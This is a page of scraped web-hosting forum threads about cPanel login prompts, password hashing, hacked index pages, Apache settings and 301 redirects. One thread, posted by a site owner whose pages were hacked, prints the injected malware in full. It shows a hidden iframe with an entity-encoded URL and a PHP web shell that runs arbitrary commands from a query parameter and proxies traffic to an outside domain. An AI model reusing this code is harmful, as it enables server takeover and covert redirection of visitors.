CPanel Prompts Login On Websites Index

Jan 25, 2008

I'm having an issue on my buddies website. He keeps getting this weird login prompt whenever you view his website. I thought it was just for his site itself but then I remembered e107 never has a pop up prompt to ask you to log in. I looked closely and realize it said its for the cPanel. So whenever you try to view the index page of his site it asks you for your user name and password. Very odd... Anyone know what could be causing this.?

View 2 Replies


ADVERTISEMENT

Login Security For Websites

Jun 9, 2007

how to best secure logins and password storage, I'm trying to come up with a set of tools to make this easier, but first I'd like to hear opinions if my ideas are feasible, and most importantly secure.

Most scripts (including very popular ones like phpBB) send the password & username over http and then perform an MD5 hash on the sent password on the server and compares it to the hash stored in the database.

I'm thinking this is really quite insecure for more then a few reasons.

1) The password could easily be sniffed since it's sent in plain-text
2) MD5 is a pretty weak hashing algorithms with plenty of exposed vulnerabilities
3) If a hacker was to get their hands on the database, they could just brute force (birthday, rainbow tables, etc) the passwords and get the passwords to a large group of users in a fairly limited time since people are horrible with their passwords

I'm thinking a secure alternative could be something like...

1) Combine the password and username client side (via js) and send the username over plain text, but instead of the password send a hash (preferably with a strong algorithm like SHA256) to the server.

-- This would increase the work of a hacker that managed to sniff out the connection right? This shouldn't be a major drain on bandwidth (SHA256 JS Code < 3.5 Kbs) and the length of the hash shouldn't cause any major additional load, right?
-- Obviously HTTPS would be a much better solution, but that's quite a bit harder to implement.

2) The server should then perform plenty of operations on the hash sent by the password, the most important of which would be salting the hash and rehashing the result.

-- This would make it nearly impossible to use rainbow tables, and a hacker would have to separately brute force each users password?

Okay, the set of tools for developers I've mentioned early in this post is available at [url], I'd like some opinions on whether this is even a good idea, and if I'm doing anything (or nothing ) right. I'm going to be making additions to common applications to help increase the level of security in the passwords department.

View 7 Replies View Related

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

Code:
><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

View 5 Replies View Related

Setting Index.html As Default Page Instead Of Index.php?

Jun 23, 2008

Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.

View 1 Replies View Related

301 Redirect From Index.htm Index.asp Using Limited IIS Server

Mar 6, 2007

I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.

The problem is that their old index.htm page has a pagerank of 4 which we want to keep.

And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.

The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.

My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?

JavaScript, I have heard is completely out the question

View 3 Replies View Related

VPS With WHM/cPanel Webmail - Login ... Then Login Fails

Jan 31, 2008

Just got a new additional VPS with WHM/cPanel.

Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!

The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.

View 3 Replies View Related

CPanel / Apache 'Index Of /'

Sep 30, 2009

how to display the time and date of a file that was added to an Apache file directory on a cPanel server?

It used display the time and date back in the 1.3 and 2.0 days, but it doesn't on the 2.2 versions of Apache.

View 2 Replies View Related

Protect Index File With Cpanel

Oct 26, 2008

I have subdomain, the index file was hacked

Who know how to protect the Index files with cpanel

View 8 Replies View Related

WHM (cPanel) Erase Index Footer Info

Jan 8, 2008

I am using a new redhat box with WHM (cPanel) and was wondering why all of my indexes have a footer suchs as this on them:

Apache/2.0.61 (Unix) mod_ssl/2.0.61 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 Server at www.domain.com Port 80

View 5 Replies View Related

Index.php Is Not Working But Index.php? Is Ok

Mar 27, 2007

I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.

when I add "?" to the end of the URL[url]" it runs with no problems!

Is it something wrong with httpd.conf or what?

View 6 Replies View Related

Apache 2.2 & CPanel :: Some Websites Download Instead Of View

Oct 16, 2007

I'm trying to get setup with Apache 2.2, and did just fine on one server but the second one is giving me some troubles. I'm having an issue with some sites wanting to download instead of display. Does this ring any bells with anyone right off?

httpd.conf appears to be okay as far as I can see, but obviously something is not quite right somewhere.

View 5 Replies View Related

Login To Whm Or Cpanel

Nov 14, 2008

i have a problem with my box .. after i reboot the server the login to whm or cpanel didn't work ... everytime i must use this command

/etc/rc.d/init.d/iptables stop
then the logins work successfully

so .. what's the problem with the iptables with me?

View 6 Replies View Related

Login To Cpanel And WHM

Apr 23, 2008

I have someone on my server that is having problems login to Cpanel and WHM.

They can view all websites on the server even theirs, but they cannot login.

They keep getting: Firefox cannot establish a connection with the server.

Even in IE they get a error message.

They even tried with "theirdomain.com/cpanel" and got the same thing.

They are using a rounter also, so I told them to try unhooking that, but my main question is, it doesn't seem that their IP is blocked as I checked, so is there anything else on the server that could cause this or is it something on their end?

View 8 Replies View Related

Can't Login CPanel/WHM

Mar 1, 2008

I've unmanaged server, everything running well

but I can't login into cpanel/whm I tried :
>myip:2086
>myip:2087
>myip:2082
>myip:2083

when I try to login the [The connection was reset]Firefox msg.

I can login through ssh,and i tried to restart cpanel service and I update it...

View 11 Replies View Related

SSL Possible To Install In WHM/CPANEL Login

Nov 6, 2009

i worrying about WHM/CPanel login without SSL, it possible to install SSL?

View 5 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved